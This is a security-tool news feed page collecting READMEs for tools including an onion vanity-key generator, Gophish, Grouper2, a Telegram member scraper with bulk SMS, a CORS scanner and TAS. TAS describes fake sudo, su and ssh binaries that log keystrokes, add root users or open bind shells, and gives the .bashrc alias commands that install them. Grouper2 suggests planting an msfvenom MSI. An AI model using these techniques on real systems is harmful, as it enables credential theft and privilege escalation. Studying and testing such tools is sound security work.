Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5841 articles
Browse latest View live

Scallion - GPU-based Onion Addresses Hash Generator

$
0
0

Scallion lets you create vanity GPG keys and .onion addresses (for Tor'shidden services) using OpenCL.
Scallion runs on Mono (tested in Arch Linux) and .NET 3.5+ (tested on Windows 7 and Server 2008).
Scallion is currently in beta stage and under active development. Nevertheless, we feel that it is ready for use. Improvements are expected primarily in performance, user interface, and ease of installation, not in the overall algorithm used to generate keys.

FAQ
Here are some frequently asked questions and their answers:
  • Why generate GPG keys?
    Scallion was used to find collisions for every 32bit key id in the Web of Trust's strong set demonstrating how insecure 32bit key ids are. There was/is a talk at DEFCON (video) and additional info can be found at https://evil32.com/.
  • What are valid characters?
    Tor .onion addresses use Base32, consisting of all letters and the digits 2 through 7, inclusive. They are case-insensitive.
    GPG fingerprints use hexadecimal, consisting of the digits 0-9 and the letters A-F.
  • Can you use Bitcoin ASICs (e.g. Jalapeno, KnC) to accelerate this process?
    Sadly, no. While the process Scallion uses is conceptually similar (increment a nonce and check the hash), the details are different (SHA-1 vs double SHA-256 for Bitcoin). Furthermore, Bitcoin ASICs are as fast as they are because they are extremely tailored to Bitcoin mining applications. For example, here's the datasheet for the CoinCraft A-1, an ASIC that never came out, but is probably indicitive of the general approach. The microcontroller sends work in the form of the final 128-bits of a Bitcoin block, the hash midstate of the previous bits, a target difficulty, and the maximum nonce to try. The ASIC chooses the location to insert the nonce, and it chooses what blocks meet the hash. Scallion has to insert the nonce in a different location, and it checks for a pattern match rather than just "lower than XXXX".
  • How can you use multiple devices?
    Run multiple Scallion instances. Scallion searches are probabilistic, so you won't be repeating work with the second device. True multi-device support wouldn't be too difficult, but it also wouldn't add much. I've run several scallion instances in tmux or screen with great success. You'll just need to manually abort all the jobs when one finds a pattern (or write a shell script to monitor the output file and kill them all when it sees results).

Dependencies
  • OpenCL and relevant drivers installed and configured. Refer to your distribution's documentation.
  • OpenSSL. For Windows, the prebuilt x86 DLLs are included
  • On windows only, VC++ Redistributable 2008

Binary Download
Just want the latest binary version? Grab it here.

Build Linux
Prerequisites
  • Get the latest mono for your linux distribution:
    http://www.mono-project.com/download/
  • Install Common dependencies:
    sudo apt-get update
    sudo apt-get install libssl-dev mono-devel
  • AMD/OpenSource build sudo apt-get install ocl-icd-opencl-dev
  • Nvidia build sudo apt-get install nvidia-opencl-dev nvidia-opencl-icd
  • Finally msbuild scallion.sln

Docker Linux (nvidia GPUs only)
  1. Have the nvidia-docker container runtime
  2. Build the container:
    docker build -t scallion -f Dockerfile.nvidia .
  3. Run:
    docker run --runtime=nvidia -ti --rm scallion -l
    screenshot of expected output

Build Windows
  1. Open 'scallion.sln' in VS Express for Desktop 2012
  2. Build the solution, I did everything in debug mode.

Usage
Restarting Scallion during a search will not lose "progress". It is a probabilistic search and Scallion does not make "progress"
List devices
$ mono scallion/bin/Debug/scallion.exe -l
Generate a hash
$ mono scallion/bin/Debug/scallion.exe -d 0 prefix
Cooking up some delicious scallions...
Using kernel optimized from file kernel.cl (Optimized4)
Using work group size 128
Compiling kernel... done.
Testing SHA1 hash...
CPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
GPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
Looks good!
LoopIteration:40 HashCount:671.09MH Speed:9.5MH/s Runtime:00:01:10 Predicted:00:00:56 Found new key! Found 1 unique keys.
<XmlMatchOutput>
<GeneratedDate>2014-08-05T07:14:50.329955Z</GeneratedDate>
<Hash>prefix64kxpwmzdz.onion</Hash>
<PrivateKey>-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCmYmTnwGOCpsPOqvs5mZQbIM1TTqOHK1r6zGvpk61ZaT7z2BCE
FPvdTdkZ4tQ3/95ufjhPx7EVDjeJ/JUbT0QAW/YflzUfFJuBli0J2eUJzhhiHpC/
1d3rb6Uhnwvv3xSnfG8m7LeI/Ao3FLtyZFgGZPwsw3BZYyJn3sD1mJIJrQIEB/ZP
ZwKBgCTUQTR4zcz65zSOfo95l3YetVhfmApYcQQd8HTxgTqEsjr00XzW799ioIWt
vaKMCtJlkWLz4N1EqflOH3WnXsEkNA5AVFe1FTirijuaH7e46fuaPJWhaSq1qERT
eQT1jY2jytnsJT0VR7e2F83FKINjLeccnkkiVknsjrOPrzkXAkEA0Ky+vQdEj64e
iP4Rxc1NreB7oKor40+w7XSA0hyLA3JQjaHcseg/bqYxPZ5J4JkCNmjavGdM1v6E
OsVVaMWQ7QJBAMweWSWtLp6rVOvTcjZg+l5+D2NH+KbhHbNLBcSDIvHNmD9RzGM1
Xvt+rR0FA0wUDelcdJt0R29v2t19k2IBA8ECQFMDRoOQ+GBSoDUs7PUWdcXtM7Nt
QW350QEJ1hBJkG2SqyNJuepH4PIktjfytgcwQi9w7iFafyxcAAEYgj4HZw8CQAUI
3xXEA2yZf9/wYax6/Gm67cpKc3sgKVczFxsHhzEml6hi5u0FG7aNs7jQTRMW0aVF
P8Ecx3l7iZ6TeakqGhcCQGdhCaEb7bybAmwQ520omqfHWSte2Wyh+sWZXNy49EBg
d1mBig/w54sOBCUHjfkO9gyiANP/uBbR6k/bnmF4dMc=
-----END RSA PRIVATE KEY-----
</PrivateKey>
<PublicModulusBytes>pmJk58BjgqbDzqr7OZmUGyDNU06jhyta+sxr6ZOtWWk+89gQhBT73U3ZGeLUN//ebn44T8exFQ43ifyVG09EAFv2H5c1HxSbgZYtCdnlCc4YYh6Qv9Xd62+lIZ8L798Up3xvJuy3iPwKNxS7cmRYBmT8LMNwWWMiZ97A9ZiSCa0=</PublicModulusBytes>
<PublicExponentBytes>B/ZPZw==</PublicExponentBytes>
</XmlMatchOutput>
ini t: 491ms / 1 (491ms, 2.04/s)
generate key: 1193ms / 6 (198.83ms, 5.03/s)
cpu precompute: 10ms / 6 (1.67ms, 600/s)
total without init: 70640ms / 1 (70640ms, 0.01/s)
set buffers: 0ms / 40 (0ms, 0/s)
write buffers: 3ms / 40 (0.08ms, 13333.33/s)
read results: 67442ms / 40 (1686.05ms, 0.59/s)
check results: 185ms / 40 (4.63ms, 216.22/s)

9.50 million hashes per second

Stopping the GPU and shutting down...

Multipattern Hashing
Scallion supports finding one or more of multiple patterns through a primitive regex syntax. Only character classes (ex. [abcd]) are supported. The . character represents any character. Onion addresses are always 16 characters long and GPG fingerprints are always 40 characters. You can find a suffix by putting $ at the end of the match (ex. DEAD$). Finally, the pipe syntax (ex. pattern1|pattern2) can be used to find multiple patterns. Searching for multible patterns (within reason) will NOT produce a significant decrease in speed. Many regexps will produce a single pattern on the GPU and result in no speed reduction.
Some use cases with examples:
  • Generate a prefix followed by a number for better readability:
      mono scallion.exe prefix[234567]
  • Search for several patterns at once (n.b. -c causes scallion to continue generating even once it gets a hit)
      mono scallion.exe -c prefix scallion hashes
    mono scallion.exe -c "prefix|scallion|hashes"
  • Search for the suffix "badbeef"
      mono scallion.exe .........badbeef
    mono scallion.exe --gpg badbeef$ # Generate GPG key
  • Complicated self explanatory example:
      mono scallion.exe "suffixa$|suffixb$|prefixa|prefixb|a.suffix$|a.test.$"

How does Scallion work?
At a high level Scallion works as follows:
  1. Generate RSA key using OpenSSL on the CPU
  2. Send the key to the GPU
  3. Increase the key's public exponent
  4. Hash the key
  5. If the hashed key is not a partial collision go to step 3
  6. If the key does not pass the sanity checks recommended by PKCS #1 v2.1 (checked on the CPU) go to step 3
  7. Brand new key with partial collision!
The basic algorithm is described above. Speed / performance is the result of massive parallelization, both on the GPU and the CPU.

Speed / Performance
It is important to realize that Scallion preforms a probabilistic search. Actual times may very significantly from predicated
The inital RSA key generation is done the CPU. An ivybridge i7 can generate 51 keys per second using a single core. Each key can provide 1 gigahash worth of exponents to mine and a decent CPU can keep up with several GPUs as it is currently implemented.
SHA1 hashing is done on the GPU. The hashrates for several GPUs we have tested are below (grouped by manufacturer and sorted by power):
GPUSpeed
Intel i7-2620M9.9 MH/s
Intel i5-5200U118 MH/s
NVIDIA GT 52038.7 MH/s
NVIDIA Quadro K2000M90 MH/s
NVIDIA GTS 250128 MH/s
NVIDIA GTS 450144 MH/s
NVIDIA GTX 670480 MH/s
NVIDIA GTX 9702350 MH/s
NVIDIA GTX 9803260 MH/s
NVIDIA GTX 1050 (M)1400 MH/s
NVIDIA GTX 10704140 MH/s
NVIDIA GTX 1070 TI5100 MH/s
NVIDIA GTX TITAN X4412 MH/s
NVIDIA GTX 10805760 MH/s
NVIDIA Tesla V10011646 MH/s
AMD A8-7600 APU120 MH/s
AMD Radeon HD5770520 MH/s
AMD Radeon HD6850600 MH/s
AMD Radeon RX 460840 MH/s
AMD Radeon RX 470957 MH/s
AMD Radeon R9 380X2058 MH/s
AMD FirePro W91002566 MH/s
AMD Radeon RX 4802700 MH/s
AMD Radeon RX 5803180 MH/s
AMD Radeon R9 Nano3325 MH/s
AMD Vega Frontier Edition7119 MH/s
MH/s = million hashes per second
Its worth noting that Intel has released OpenCL drivers for its processors and short collisions can be found on the CPU.
To calculate the number of seconds required for a given partial collision (on average), use the formula:
TypeEstimated time
GPG Key2^(4*length-1) / hashspeed
.onion Address2^(5*length-1) / hashspeed
For example on my nVidia Quadro K2000M, I see around 90 MH/s. With those speed I can generate an eight character .onion prefix in about 1h 41m, 2^(5*8-1)/90 million = 101 minutes.

Workgroup Size
Scallion will use your devices reported preferred work group size by default. This is a reasonable default but experimenting with the workgroup may increase performance.

Security
The keys generated by Scallion are quite similar to those generated by shallot. They have unusually large public exponents, but they are put through the full set of sanity checks recommended by PKCS #1 v2.1 via openssl's RSA_check_key function. Scallion supports several RSA key sizes, with optimized kernels for 1024b, 2048b, and 4096b. Other key sizes may work, but have not been tested.

Thanks / References

Donations
Feel free to direct donations to the Bitcoin address: 1FxQcu6vhpwsqcTjPsjK43CZ9vjnuk4Hmo



Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder

$
0
0

Aaia (pronounced as shown here ) helps in visualizing AWS IAM and Organizations in a graph format with help of Neo4j. This helps in identifying the outliers easily. Since it is based on neo4j , one can query the graph using cypher queries to find the anomalies.
Aaia also supports modules to programatically fetch data from neo4j database and process it in a custom fashion. This is mostly useful if any complex comparision or logic has to be applied which otherwise would not be easy through cypher queries.
Aaia was initially intended to be a tool to enumerate privelege esclation possibilities and find loop holes in AWS IAM. It was inspired from the quote by @JohnLaTwC
"Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win."

Why the name "Aaia" ?
Aaia in Tamil means grandma. In general, Aaia knows everything about the family. She can easily connect who is related to whom; and how ;and give you the connection within a split second. She is a living graph database. :P
Since "Aaia" (this tool) also does more or less the same, hence the name.

Installation

Install the neo4j Database
Instructions here
Setup the username , password and bolt connection uri in Aaia.conf file. An example format is given in Aaia.conf file already.

Install OS dependency

Debian :-
apt-get install awscli jq

Redhat / Fedora / Centos / Amazon Linux :-
yum install awscli jq

Note:
These packages are needed for Aaia_aws_collector.sh script. Ensure these packages are present in the base system from where the collector script is being run.

Clone this repository
git clone https://github.com/rams3sh/Aaia
cd Aaia/

Create a virtual environment
python3 -m venv env

Activate the virtual environment
source env/bin/activate
Note: Aaia depends on pyjq library which is not stable in windows currently. Hence Aaia is not supported for Windows OS.

Install the dependencies
python -m pip install -r requirements.txt

Using Aaia

Setting up Permissions in AWS
Aaia would require following AWS permissions for collector script to collect relevant data from AWS
iam:GenerateCredentialReport
iam:GetCredentialReport
iam:GetAccountAuthorizationDetails
iam:ListUsers
iam:GetUser
iam:ListGroups
iam:ListRoles
iam:GetRole
iam:GetPolicy
iam:GetAccountPasswordPolicy
iam:GetAccountSummary
iam:ListAccountAliases
organizations:ListAccountsForParent
organizations:ListOrganizationalUnitsForParent
organizations:DescribeOrganization
organizations:ListRoots
organizations:ListAccounts
organizations:ListTagsForResource
organizations:ListPolicies
organizations:ListTargetsForPolicy
organizations:DescribePolicy
organizations:ListAWSServiceAccessForOrganization
"Organizations" related permissions can be ommitted. However , all the above mentioned "IAM" related permissions are necessary.
Ensure the permissions are available to the user / role / any aws principal which will be used for collection of data for the collector script.

Collecting data from AWS
Ensure you have aws credentials configured. Refer this for help.
Once the crendential is setup.
Run:-
./Aaia_aws_collector.sh <profile_name>
Ensure the output format of the aws profile being used for data collection is set to json as Aaia expects the data collected to be in json format.

Note:-
In case of a requirement where data has to be collected from another instance; copy "Aaia_aws_collector.sh" file to the remote instance , run it and copy the generated "offline_data" folder to the Aaia path in the instance where Aaia is setup and carry on with following steps. This will be helpful in cases of consulting or client audit.

Loading the collected data to Neo4j DB
python Aaia.py -n <profile_name> -a load_data
-n supports "all" as value which means load all data collected and present within offline_data folder.

Note:
Please ensure you do not have profile as "all" in the credentials file as it may conflict with the argument. :P
Now we are ready to use Aaia.

Audit IAM through a custom module
As of now , a sample module is given as a skeleton example. One can consider this as a reference for building custom modules.
python Aaia.py -n all -m iam_sample_audit

Thanks to
Aaia is influenced and inspired from various amazing open source projects. Huge Shoutout to :-

Aaia in Action


Screenshots
A sample visual of a dummy AWS Account's IAM


A sample visual of a result of a cypher query to find all relations of a user in AWS IAM


TO DO
  • Write a detailed documentation for understanding Aaia's Neo4j DB Schema
  • Write a detailed documentation for developing custom modules for Aaia
  • Write custom modules to evaluate 28 AWS privelege escalation methods identified by RhinoSecurity.
  • Provide a cheatsheet of queries for identifying simple issues in AWS IAM
  • Extend Aaia to other cloud providers.


Gophish - Open-Source Phishing Toolkit

$
0
0

Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.

Install
Installation of Gophish is dead-simple - just download and extract the zip containing the release for your system, and run the binary. Gophish has binary releases for Windows, Mac, and Linux platforms.

Building From Source
If you are building from source, please note that Gophish requires Go v1.10 or above!
To build Gophish from source, simply run go get github.com/gophish/gophish and cd into the project source directory. Then, run go build. After this, you should have a binary called gophish in the current directory.

Docker
You can also use Gophish via an unofficial Docker containerhere.

Setup
After running the Gophish binary, open an Internet browser to https://localhost:3333 and login with the default username (admin) and password (gophish).

Documentation
Documentation can be found on our site. Find something missing? Let us know by filing an issue!


Grouper2 - Find Vulnerabilities In AD Group Policy

$
0
0

What is it for?
Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.
It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft's Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?
It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?
Where Grouper required you to:
  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there's some good stuff in there.
Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.
This means you don't have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).
Other cool new features:
  • better file permission checks that don't involve writing to disk.
  • doesn't miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it's multithreaded!
  • a bunch of other great stuff but it's late and I'm tired.
Also, it's written in C# instead of PowerShell.

How do I use it?
Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.
If the JSON burns your eyes, add -g to make it real pretty.
If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.
If there's too much candy and you want to limit output to only the tastiest morsels, set the 'interest level' with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.
If you don't want to dig around in old policy and want to limit yourself to only current stuff, do -c.
If you want the candy to fall out faster, you can set the number of threads with -t $INT - the default is 10.
If you want to see the other options, do -h.

I don't get it.
OK have a look at this:


In the screenshot above we can see an "Assigned Application" policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it's being installed from is writable by the current user.
If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!


In this one you can see that someone's done something absolutely insane to the ACLS on the registry.
You get the picture.

How can I help?
Look at the dev branch, Sh3r4 has been working on a big refactor to make it easier to maintain and more efficient going forward.
A rough roadmap ATM is:
  • Get dev branch functioning at least as well as master does.
    • If you want to help with this, look at issues tagged 'dev'.
  • Finish basic unit tests of assessment and interest-level code blocks.
  • Bring the big refactor over to master.
  • Start actually working on the other issues and features and whatnot.
If you want to discuss via Slack you can ping me (@l0ss) on the BloodHound Slack, joinable at https://bloodhoundgang.herokuapp.com/, or chat with a group of contributors in the #Grouper channel.

Credits and Thanks
  • Huge thanks to Sh3r4 for all her help, I have no idea how to write code and it would show way worse without her.
  • Much assistance and code cleanup from @liamosaur
  • SDDL parsing from https://github.com/zacateras/
  • Thanks to @skorov8 for providing some useful registry key data.


TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)

$
0
0

Telegram Group Scraper Tool. Fetch All Information About Group Members

• How To Install & Setup API ( Termux )


• API Setup
  • Go to http://my.telegram.org and log in.
  • Click on API development tools and fill the required fields.
  • put app name you want & select other in platform Example :
  • copy "api_id" & "api_hash" after clicking create app ( will be used in setup.py )

• How To Install and Use
$ pkg install -y git python
$ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git
$ cd TeleGram-Scraper
  • Install requierments
$ python3 setup.py -i
  • setup configration file ( apiID, apiHASH )
$ python3 setup.py -c
  • To Genrate User Data
$ python3 scrapr.py
  • ( members.csv is default if you changed name use it )
  • Send Bulk sms To Collected Data
$ python3 smsbot.py members.csv
  • add users to your group ( in devlopment )
$ python3 add2group.py members.csv
  • Update Tool
$ python3 setup.py -u


Corsy v1.0 - CORS Misconfiguration Scanner

$
0
0

Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations.

Requirements
Corsy only works with Python 3 and has the following depencies:
  • tld
  • requests
To install these dependencies, navigate to Corsy directory and execute pip3 install -r requirements.txt

Usage
Using Corsy is pretty simple
python3 corsy.py -u https://example.com

Scan URLs from a file
python3 corsy.py -i /path/urls.txt

Number of threads
python3 corsy.py -u https://example.com -t 20

Delay between requests
python3 corsy.py -u https://example.com -d 2

Export results to JSON
python3 corsy.py -i /path/urls.txt -o /path/output.json

Custom HTTP headers
python3 corsy.py -u https://example.com --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"

Skip printing tips
-q can be used to skip printing of description, severity, exploitation fields in the output.

Tests implemented
  • Pre-domain bypass
  • Post-domain bypass
  • Backtick bypass
  • Null origin bypass
  • Unescaped dot bypass
  • Invalid value
  • Wild card value
  • Origin reflection test
  • Third party allowance test
  • HTTP allowance test

TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries

$
0
0

A tiny framework for easily manipulate the tty and create fake binaries.

How it works?
The framework has three main functions, tas_execv, tas_forkpty, and tas_tty_loop.
  • tas_execv: It is a function similar to execv, but it doesn't re-execute the current binary, something very useful for creating fake binaries.
  • tas_forkpty: Is the same as forkpty, but it fills a custom structure, check forkpty man page for more details.
  • tas_tty_loop: here is where the manipulation of the tty happen, you can set a hook function for the input and output, so it is possible to store the keys typed by the user or manipulate the terminal output. (see leet-shell).
This is a superficial overview, check the codes in tas/fakebins/fun folders to understand how it really works.

Fakebins
Through manipulation of the PATH environment variable, or by using bash's aliases (or any other shell that supports aliases), you can run another program instead of the program that the user usually runs. This makes it possible to capture keystrokes and modify the command line to change the original program behavior.
Change the command line of some programs, like sudo and su, can lead to privilege escalation.
I'd created three programs as an example of what you can do with the framework: sudo, su and generic-keylogger.

generic-keylogger
The generic-keylogger, as the name suggests, is a binary that acts like a keylogger, the main idea is to use it to get passwords of programs like ssh, mysql, etc.

sudo/su
It can be used as a keylogger, or you can run some of the modules as root, by manipulating the command line.

Step-by-step cmd change:
The user types sudo cmd
fakesudo cmd runs
The fakesudo executes sudo fakesudo cmd
After it is running as root, the fakesudo create a child process for executing some of the modules, and in the main PID, it runs the original command.
Note: fakesudo only changes the command if the user runs sudo cmd [args], if some additional flags are used, then the command isn't touched.
Almost the same process happens with the su:
The user types su -
fakesu - runs
The fakesu executes su - -c fakesu
After it is running as root, the fakesu create a child process for executing some of the modules, and in the main PID, it runs bash -i
Note: fakesu only changes the command if the user runs su or su -, if some additional flags are used, then the command isn't touched.

Modules
For now, there are only three modules:
  • add-root-user - creates a root user with password in /etc/passwd.
  • bind-shell - listen for incoming connections and spawn a tty shell.
  • system - executes a command as root.
I can add more modules in the future, but if you are familiar with the C language, I believe that it is not very difficult to change the programs to run what you want as root, just modify a few lines of code and change the super() function.

Building
First, build the base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
After that, you can build generic-keylogger, sudo or su, by running make [target-bin]
Example:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'

Examples

Creating a fakessh:
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
Install:
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
In action:

Using the bind-shell module
Compile:
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
Install:
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
In action:

leet-shell
leet-shell is an example of how you can manipulate the tty output, it allows you to use the bash like a 1337 h4x0r.
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!


AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model

$
0
0
AlertResponder is a serverless framework for automatic response of security alert.

Overview
AlertResponder receives an alert that is event of interest from security view point and responses the alert automatically. AlertResponder has 3 parts of automatic response.
  1. Inspector investigates entities that are appeaered in the alert including IP address, Domain name and store a result: reputation, history of malicious activities, associated cloud instance and etc. Following components are already provided to integrate with your AlertResponder environment. Also you can create own inspector to check logs that is stored into original log storage or log search system.
  2. Reviewer receives the alert with result(s) of Inspector and evaluate severity of the alert. Reviewer should be written by each security operator/administrator of your organization because security policies are differ from organazation to organization.
  3. Emitter finally receives the alert with result of Reviewer's severity evaluation. After that, Emitter sends external integrated system. E.g. PagerDuty, Slack, Github Enterprise, etc. Also automatic quarantine can be configured by AWS Lambda function.

Concept
  • Pull based correlation analysis
  • Alert aggregation
  • Pluggable Inspectors and Emitters

Getting Started
Please replace follwoing variables according to your environment:
  • $REGION: Replace it with your AWS region. (e.g. ap-northeast-1)
  • $STACK_NAME: Replace it with CloudFormation stack name
$ curl -o alert_responder.yml https://s3-$REGION.amazonaws.com/cfn-assets.$REGION/AlertResponder/templates/latest.yml
$ aws cloudformation deploy --template-file alert_responder.yml --stack-name $STACK_NAME --capabilities CAPABILITY_IAM

Development

Architecture Overview


Prerequisite
  • awscli >= 1.16.20
  • Go >= 1.11
  • GNU automake >= 1.16.1

Deploy and Test

Deploy own AlertResponder stack
Prepare a parameter file, e.g. config.json and run make command.
$ cat config.json
{
"StackName": "your-alert-responder-name",
"TestStackName": "your-test-stack-name",
"CodeS3Bucket": "your-some-bucket",
"CodeS3Prefix": "for-example-functions",

"InspectionDelay": "1",
"ReviewDelay": "10"
}
$ env AR_CONFIG=config.json make deploy
NOTE: Please make sure that you need AWS credentials (e.g. API key) and appropriate permissions.

Deploy a test stack
After deploying AlertResponder, move to under tester directory and deploy a stack for testing.
$ cd tester/
$ make AR_CONFIG=../config.json deploy
You can see param.json that is created by script under tester directory after deploying.
$ cat params.json
{
"AccountId": "214219211678",
"Region": "ap-northeast-1",
"Inspector": "slam-alert-responder-test-functions-Inspector-1OBGU89CT1P4B",
"Reporter": "slam-alert-responder-test-functions-Reporter-1NDHU0VDI8OPA"
}
Then, back to top level directory of the git repository and you can run integration test.
$ go test -v
=== RUN TestInvokeBySns
--- PASS: TestInvokeBySns (3.39s)
(snip)
PASS
ok github.com/m-mizutani/AlertResponder 20.110s



YARASAFE - Automatic Binary Function Similarity Checks with Yara

$
0
0

SAFE is a tool developed to create Binary Functions Embedding developed by Massarelli L., Di Luna G.A., Petroni F., Querzoni L. and Baldoni R. You can use SAFE to create your function embedding to use inside yara rules.
If you are interested take a look at our research paper: https://arxiv.org/abs/1811.05296
If you are using this for your research please cite:
@inproceedings{massarelli2018safe,
title={SAFE: Self-Attentive Function Embeddings for Binary Similarity},
author={Massarelli, Luca and Di Luna, Giuseppe Antonio and Petroni, Fabio and Querzoni, Leonardo and Baldoni, Roberto},
booktitle={Proceedings of 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA)},
year={2019}
}
This is not the code for reproducing the experiments in the paper. If you are interested on it take a look at: https://github.com/gadiluna/SAFE

Introduction
Using yarasafe you can easily create signature for binary functions without lookng at the assembly code at all! You just need to install the IDA Pro Plugins that you find the IDA Pro Plugin folder of this repository.
Once you have installed the plugin you can start creating embeddings for the function you want to match. These embeddings can be inserted into yara rules to match function using yara. To create powerful rule, you can combine multiple functions embeddings with standard yara rules.
In this repository you will find the plugin for IDA Pro, and the yarasafe module.
Yarasafe can match functions with more than 50 instructions and less than 150.

Requirements
  • python3
  • radare2
  • jansson

Quickstart
First of all install the IDA Pro plugin. You can find the instruction for doing it in the ida-pro-plugin folder of this repository. Then you can use our docker container or you can build yara with yarasafe module.

Docker
The fastest way to use yarasafe is to use our docker container.
Pull the images:
  • docker pull massarelli/yarasafe
Start the docker mounting the folder that contains the rule and the file to analyze:
  • docker run -v {FOLDER_TO_MOUNT}:/home/yarasafe/test -it massarelli/yarasafe bash
Launch yara inside the docker with your rule!

Ubuntu
  • Clone the repository:
git clone https://github.com/lucamassarelli/yarasafe.git
  • Install yara dependencies:
sudo apt-get install automake libtool make gcc flex bison 
sudo apt-get install libjansson-dev
  • Install radare2 on your system:
git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh
  • Install yarasafe dependencies:
cd yarasafe/python_script
pip3 install -r requirements.txt
  • Compile:
./bootstrap.sh
./configure
make
  • Export environment variable:
export YARAPYSCRIPT={PATH_TO_YARASAFE_REPO}/python_script

MacOS
  • Clone the repository:
git clone https://github.com/lucamassarelli/yarasafe.git
  • Install yara dependencies:
brew install automake libtool flex bison 
brew install jansson
  • Install radare2 on your system:
git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh
Install yarasafe dependencies:
cd yarasafe/python_script
pip3 install -r requirements.txt
  • Compile:
./bootstrap.sh
./configure.sh
make
  • Export environment variable:
export YARAPYSCRIPT={PATH_TO_YARASAFE_REPO}/python_script

Testing
Inside the folder rules you can find the rule sample_safe_rule.yar. This rule should trigger with any PE file:
yara {PATH_TO_YARASAFE_REPO}/rules/sample_safe_rule.yar {FILES}

How to write your rule
To create your safe-yara-rule, you first need to create the embeddings for your function. In order to accomplish this, you can use the IDA Pro plugin shipped within this repository. Inside the folder ida-pro-plugin you can find all the information on how to run the plugin!
Once you get the embeddings for your functions, you just need to create the rule. An example of safe-yara-rule is:
import "safe"

rule example
{
meta:
description = "This is just an example"
threat_level = 3
in_the_wild = true

condition:
safe.similarity("[-0.02724416,0.00640265,0.01138294,-0.07013566,0.00306808,-0.09757628,0.10414989,-0.13555837,-0.07873314,-0.00725415,-0.01418876,-0.05907412,-0.12452127,0.06237456,0.02260636,-0.06013175,0.11689295,-0.00200026,-0.03594812,0.07857288,-0.00288544,0.01148411,0.00891006,0.04702956,0.1205316,0.0079077,-0.07449158,0.00653283,0.15414064,0.13021031,0.01325423,-0.35491243,-0.00992016,-0.21460094,0.0558461,-0.07761839,-0.10909985,-0.05616508,0.01800609,0.06736821,0.00308393,0.04241242,-0.08351246,0.13501632,-0.10729794,-0.10229874,0.00066896,-0.01963937,0.05516102,-0.01612499,-0.09743191,-0.0314435,-0.01470971,-0.00125769,-0.01774654,0.2332938,0.14166495,0.16998142,-0.04843156,-0.08931472,0.13102795,0.14147657,0.02275739,-0.04335862,0.05724025,0.03936686,-0.105 26938,-0.11637416,-0.0112917,0.05484914,-0.06934103,0.2543144,-0.17833991,-0.00828893,0.00174531,-0.03048271,-0.04773486,0.095866,-0.14434388,0.11433239,-0.10749247,0.03952292,0.03988512,-0.11541581,-0.07812429,-0.04978319,0.32052052,-0.0497911,-0.13022986,0.02477266,-0.05968329,0.01724695,0.01577485,-0.0497415,0.24494685,0.00361651,-0.08172874,-0.07473877,-0.01046288,0.02298573]") > 0.95
}
The rule will be satisfied if inside the sample there is at least one function whose similarity with target is more then 0.95.

Adding safe to your version of yara
If you want to add safe to your yara repository:
  • Install all dependencies
  • Copy the file libyara/modules/safe.c into your_rep/libyara/modules/safe.c
